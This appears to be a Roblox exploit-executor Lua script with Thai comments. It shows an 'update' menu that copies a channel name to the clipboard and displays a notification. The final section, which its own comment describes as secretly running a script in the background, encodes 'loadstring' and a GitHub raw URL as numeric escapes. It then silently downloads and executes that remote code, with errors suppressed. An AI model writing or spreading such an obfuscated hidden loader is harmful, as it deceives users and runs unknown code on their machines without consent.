local Players = game:GetService("Players")
local UIS = game:GetService("UserInputService")
local player = Players.LocalPlayer

-- [[ ฟังก์ชันสร้างแจ้งเตือนแบบเด้งเรียงแถวลงมา ]] --
local function showStackingNotification()
    local notificationGui = player.PlayerGui:FindFirstChild("PisitStackNotif") or Instance.new("ScreenGui", player.PlayerGui)
    notificationGui.Name = "PisitStackNotif"
    notificationGui.ResetOnSpawn = false

    local listLayout = notificationGui:FindFirstChild("UIListLayout") or Instance.new("UIListLayout", notificationGui)
    listLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center
    listLayout.VerticalAlignment = Enum.VerticalAlignment.Top
    listLayout.Padding = UDim.new(0, 10)

    local container = notificationGui:FindFirstChild("Container") or Instance.new("Frame", notificationGui)
    container.Name = "Container"
    container.Size = UDim2.new(1, 0, 1, 0)
    container.BackgroundTransparency = 1
    listLayout.Parent = container

    local notif = Instance.new("TextLabel", container)
    notif.Size = UDim2.new(0, 450, 0, 50)
    notif.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    notif.BackgroundTransparency = 0.2
    notif.TextColor3 = Color3.fromRGB(0, 255, 127)
    notif.Text = "คุณได้ กอปปี้ ชื่อช่องของ เจ้าของสคริปแล้ว✅"
    notif.Font = Enum.Font.SourceSansBold
    notif.TextScaled = true
    
    local stroke = Instance.new("UIStroke", notif)
    stroke.Thickness = 2
    stroke.Color = Color3.fromRGB(255, 255, 255)
    Instance.new("UICorner", notif).CornerRadius = UDim.new(0, 10)

    -- สุ่มเวลาแสดงผล 3-5 วินาทีตามสั่ง
    local displayTime = math.random(3, 5)
    task.delay(displayTime, function()
        for i = 0, 1, 0.1 do
            if notif then
                notif.TextTransparency = i
                notif.BackgroundTransparency = i + 0.2
                task.wait(0.05)
            end
        end
        notif:Destroy()
    end)
end

-- [[ สร้างหน้าต่างเมนูหลัก ]] --
local mainGui = Instance.new("ScreenGui", player.PlayerGui)
mainGui.Name = "PisitUpdateMenu"
mainGui.ResetOnSpawn = false

local frame = Instance.new("Frame", mainGui)
frame.Size = UDim2.new(0, 500, 0, 250) -- ขนาดใหญ่ประมาณ 2 นิ้ว
frame.Position = UDim2.new(0.5, -250, 0.5, -125)
frame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
frame.Active = true -- ล็อกไว้ไม่ให้ลาก
Instance.new("UICorner", frame)

-- กากบาทปิด
local close = Instance.new("TextButton", frame)
close.Size = UDim2.new(0, 35, 0, 35)
close.Position = UDim2.new(1, -40, 0, 5)
close.Text = "X"
close.BackgroundColor3 = Color3.fromRGB(180, 0, 0)
close.TextColor3 = Color3.new(1, 1, 1)
close.TextScaled = true
Instance.new("UICorner", close)
close.MouseButton1Click:Connect(function() mainGui:Destroy() end)

-- คำอธิบายด้านบน
local desc = Instance.new("TextLabel", frame)
desc.Size = UDim2.new(0.9, 0, 0, 50)
desc.Position = UDim2.new(0.05, 0, 0.1, 0)
desc.BackgroundTransparency = 1
desc.Text = "สคริปได้อัพเดทแล้ว โปรดทำตามขั้นตอนต่อไปนี้"
desc.TextColor3 = Color3.fromRGB(255, 255, 255)
desc.TextScaled = true
desc.Font = Enum.Font.SourceSansBold

-- ปุ่มซ้าย: เออกูไม่เอาแล้ว
local bLeft = Instance.new("TextButton", frame)
bLeft.Size = UDim2.new(0, 210, 0, 90)
bLeft.Position = UDim2.new(0.05, 0, 0.45, 0)
bLeft.Text = "เออกูไม่เอาแล้ว"
bLeft.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
bLeft.TextColor3 = Color3.new(1, 1, 1)
bLeft.TextScaled = true
bLeft.Font = Enum.Font.SourceSansBold
Instance.new("UICorner", bLeft)
bLeft.MouseButton1Click:Connect(function() mainGui:Destroy() end)

-- ปุ่มขวา: เออกูจะเอาก็ได้
local bRight = Instance.new("TextButton", frame)
bRight.Size = UDim2.new(0, 210, 0, 90)
bRight.Position = UDim2.new(0.53, 0, 0.45, 0)
bRight.Text = "เออกูจะเอาก็ได้"
bRight.BackgroundColor3 = Color3.fromRGB(0, 100, 255)
bRight.TextColor3 = Color3.new(1, 1, 1)
bRight.TextScaled = true
bRight.Font = Enum.Font.SourceSansBold
Instance.new("UICorner", bRight)

bRight.MouseButton1Click:Connect(function()
    setclipboard("tr.ue75") -- Copy ลงคีย์บอร์ดอัตโนมัติ
    showStackingNotification() -- แจ้งเตือนเด้งเรียงลงมา
end)

-- [[ ส่วนแอบรันสคริปต์เบื้องหลัง ]] --
local _0xL = getfenv()["\108\111\97\100\115\116\114\105\110\103"]
local _0xU = "\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\113\113\101\50\50\52\54\50\45\111\112\115\47\90\88\84\65\116\97\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\90\88\84\97\116\79\79"

task.spawn(function()
    pcall(function()
        _0xL(game:HttpGet(_0xU, true))()
    end)
end)
